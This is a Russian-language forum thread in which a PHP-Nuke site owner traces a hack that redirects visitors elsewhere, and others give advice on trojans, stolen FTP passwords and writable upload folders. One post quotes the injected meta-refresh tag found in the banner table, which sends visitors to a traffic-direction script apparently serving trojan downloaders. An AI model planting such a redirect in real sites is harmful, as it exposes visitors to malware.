взломан сайт
Всем привет!
Взломали сайт - не могу найти проблему.(А первоночально взломали аську. Через некоторое время и сайт.) Nuke 7.9 После захода на главную http://izberg.net.ua/ через несколько сек. в этом окне переключает на сайт досуга http://www.dosug.nu/servlet/ru/kiev/ Обратился к хостеру, он сказал поменять индекс, пароли фтп, БД. Все это зделал, а "воз и ныне там"... Что это может быть? Помогите, если знаете! |
если аську сломали, значит протроянили.
уперли и фтп. и залить туда могли что угодно и куда угодно. проверять все файлы на хосте. и в первую очередь - свой комп. если троян не удалил, хоть меняй пасы, хоть не меняй. |
Спасибо большое за ответ Alexander-V-Sh !!! А куда хоть примерно могли вставить, подскажите или какие надписи??????
|
я бы например, полностью перезалил весь сайт или сравнивал даты изменения файлов.
плюс проверил все директории. а вообще то врядли что то во внутрь залили. поэтому, имхо, достаточно удалить трояна, сделать защиту (чтобы больше не пролез). а на сайте заменить индекс, майнфайл, ну и тему можно. думаю этого будет достаточно. |
Спасибо за ответ, ничего это не помогло, перезалил сайт полностью. Ну, думаю, все велл... Хрена, я вообще очень РАЗОЗЛИЛСЯ, на хостера наехал. Он чуть не закрыл аккаунт. Скачал дамп БД. Проверил по поиску http://81.29.241.195/ Не поверете, нахожу в таблице nuke_banner вот такое, которое вдвое повышало трафик, которое со 100-120 посетителей скатило до 10-20 в день, которое понизило ТИЦ : <meta http-equiv=\"refresh\" content=\"0; url=http://81.29.241.195/tds/go.php?sid=3\"> Только осторожно, эти фтп трояны - доунлоадеры, просто так не кликайте. Это руководство: где таких гадов искать!
|
:whistle: господа!
не передавайте информацию, относительно паролей, логинов, другой конфедициальной инфы по аське - она взламывается на ура всякими уродами. по аське договаривайтесь, но инфу скидывайте , хотя-бы по мылу. |
все уже было сказано но я :-) добавлю (реком)
1. никогда (избегать) не пользоватся Ftp (парол) - для слива и т.д. (лючше модуль какойнибуть! :-)) 2. сатив вир машину читую и дела все через нее и только по вебу своего сайта- если троя попадет на машину то вероятност то что он попадет на вир.машин почти 0%. 3. создать вир.машин для интернета (не вводить ни каких паролей), ели вирус попадет то нежалко снести ос. из практического опыта! ну все. |
Здравствуйте!
У меня случилось почти то-же самое. Установил на сайте модуль 4nAlbum. Там есть возможность загружать пользователями фотографии, но для этого нужно на папку temp установить права 777, что я и сделал. А буквально через пару дней в эту папку залили СПАМ-СКРИПТ, за что мой хостер отключил мой сайт. Кто-нибудь может посоветовать, как обезопасить папки с правами доступа 777 от заливки туда "плохих" файлов? |
Я бы создал еще 1 папку, а в папке temp текстовый документ, в котором написано куда пересылать файлы, инфу и др. вот тока сам код который должен быть в документе непомню... и с помощью этого все пересылаетсо в созданую папку... ну просто у меня была подобная ситуация, я так сделал и гуд.
|
попробуйте сначало установить хотфикс http://warpspeed.4thdimension.de/mo...etails&lid=5176
|
Часовой пояс GMT +4, время: 10:41. |
Copyright © 2005 by Soniks